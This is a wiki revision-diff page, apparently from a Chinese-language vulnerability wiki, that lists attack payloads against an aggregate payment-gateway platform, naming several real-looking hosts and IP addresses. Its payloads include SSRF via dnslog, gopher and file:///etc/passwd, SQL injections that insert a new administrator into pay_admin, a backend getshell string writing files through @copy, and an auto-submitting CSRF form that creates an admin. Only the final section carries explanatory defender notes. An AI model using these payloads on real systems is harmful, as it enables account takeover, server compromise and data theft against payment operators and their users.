Difference between revisions of "全版本聚合支付漏洞"
| (2 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
| + | {| style="margin: auto; width: 750px;" | ||
| + | | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | | ||
| + | {| cellspacing="2px" | ||
| + | | valign="middle" | [[Image:Warn1.png|50px]] | ||
| + | | 這個頁面存在爭議,因此頁面內容存在不確定性。</span> | ||
| + | |} | ||
| + | |} | ||
| + | <br><noinclude> | ||
| + | |||
==Vul== | ==Vul== | ||
| − | + | <pre> | |
http://47.104.233.93/Payment_Index_batchQuery | http://47.104.233.93/Payment_Index_batchQuery | ||
| − | + | </pre> | |
==SSRF== | ==SSRF== | ||
| + | <pre> | ||
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 | http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 | ||
o7xva.l.dnslog.io/`file` | o7xva.l.dnslog.io/`file` | ||
| Line 18: | Line 28: | ||
| − | + | </pre> | |
==SQL注入添加管理員用戶== | ==SQL注入添加管理員用戶== | ||
| + | <pre> | ||
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+ | index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+ | ||
| + | </pre> | ||
| − | + | ==SQL注入(需要代理賬戶)== | |
| − | == | + | <pre> |
| − | |||
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry | index.php?m=user&c=IntoPieces&a=ajaxGetIndustry | ||
DATA: | DATA: | ||
| Line 36: | Line 47: | ||
http://vip.qhkjpay.cn/conn.php | http://vip.qhkjpay.cn/conn.php | ||
| − | + | </pre> | |
| − | |||
==SQL注入(payload和上面相同)== | ==SQL注入(payload和上面相同)== | ||
| + | <pre> | ||
index.php?m=user&c=api&a=ajaxGetIndustry | index.php?m=user&c=api&a=ajaxGetIndustry | ||
| − | + | </pre> | |
==后台Getshell== | ==后台Getshell== | ||
| − | manage_System_base.html | + | <pre> |
| + | manage_System_base.html | ||
',@copy($_REQUEST[x],$_REQUEST[c]),// | ',@copy($_REQUEST[x],$_REQUEST[c]),// | ||
| − | + | </pre> | |
==SQL報錯注入(API支付)== | ==SQL報錯注入(API支付)== | ||
| + | <pre> | ||
Pay_Pay_getSignkey?code=123*&merid=222 | Pay_Pay_getSignkey?code=123*&merid=222 | ||
| − | + | </pre> | |
| − | |||
| − | |||
==CSRF添加管理員== | ==CSRF添加管理員== | ||
| − | < | + | <pre> |
| − | <html lang="en" | + | <html lang="en"> |
| − | <body onload="document.forms[0].submit();" | + | <body onload="document.forms[0].submit();"> |
| − | <form | + | <form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post"> |
| − | <input type="hidden" name="username" value="ok179" | + | <input type="hidden" name="username" value="ok179"> |
| − | <input type="hidden" name="password" value="test123" | + | <input type="hidden" name="password" value="test123"> |
| − | <input type="hidden" name="reppassword" value="test123" | + | <input type="hidden" name="reppassword" value="test123"> |
| − | <input type="hidden" name="groupid" value="1" | + | <input type="hidden" name="groupid" value="1"> |
| − | </body | + | </body> |
| − | </html> | + | </html> |
| − | </ | + | </pre> |
Latest revision as of 19:47, 5 April 2021
Vul
http://47.104.233.93/Payment_Index_batchQuery
SSRF
http://api3.e-shion996.com/Payment_MGZF_PaymentQuery?data[orderid]=123&config[query_gateway]=http://o7xva.l.dnslog.io&config[mch_id]=123 o7xva.l.dnslog.io/`file` gopher://192.168.220.139:80/_POST%20/test/ssrf/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.139%250d%250aUser-Agent:%20curl/7.42.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=bbbbb file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini
SQL注入添加管理員用戶
index.php?m=Pay&c=Alipage&a=callbackurl&out_trade_no[0]=exp&out_trade_no[1]==20190722230646541015;insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27801%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
SQL注入(需要代理賬戶)
index.php?m=user&c=IntoPieces&a=ajaxGetIndustry
DATA:
id=123&name=_log ; insert%20into%20pay_admin%20(`id`,`username`,`password`,`groupid`)%20values%20(%27101%27,%27ok%27,%277aa5e695be95cdd64a88410a64dfe2c1%27,%271%27);--+
insert into pay_admin (`id`,`username`,`password`,`groupid`) values ('101','ok','7aa5e695be95cdd64a88410a64dfe2c1','1');--+
http://vip.qhkjpay.cn/conn.php
SQL注入(payload和上面相同)
index.php?m=user&c=api&a=ajaxGetIndustry
后台Getshell
manage_System_base.html ',@copy($_REQUEST[x],$_REQUEST[c]),//
SQL報錯注入(API支付)
Pay_Pay_getSignkey?code=123*&merid=222
CSRF添加管理員
<!--
  CSRF demonstration for the "add administrator" action (section "CSRF添加管理員").

  What the markup does: the onload handler on <body> submits the first form in
  the document as soon as the page loads. The form sends a POST to
  luck_Admin_addAdmin.html on 127.0.0.1:93 with four hidden fields: username,
  password, reppassword and groupid. The form carries no anti-CSRF token field.
  The server side is not shown on this page, so whether the request is accepted
  on the session cookie alone is the claim being made, not something visible here.

  Defender notes:
  - Mitigation: require an unpredictable per-session token on every
    state-changing admin request, reject admin POSTs whose Origin or Referer is
    not the panel's own origin, set SameSite on the session cookie, and ask for
    re-authentication before an account is created.
  - Detection: look for POSTs to the add-admin endpoint with a foreign or
    missing Origin/Referer, and for admin accounts with no matching change record.
  - groupid=1 is presumably the administrator group (the pay_admin inserts
    elsewhere on this page use the same value); confirm against the schema.
  - The listing never closes the form element; that is reproduced as found.
-->
<html lang="en">
  <body onload="document.forms[0].submit();">
    <form id="form1" name="form1" action="http://127.0.0.1:93/index.php/luck_Admin_addAdmin.html" method="post">
      <input type="hidden" name="username" value="ok179">
      <input type="hidden" name="password" value="test123">
      <input type="hidden" name="reppassword" value="test123">
      <input type="hidden" name="groupid" value="1">
  </body>
</html>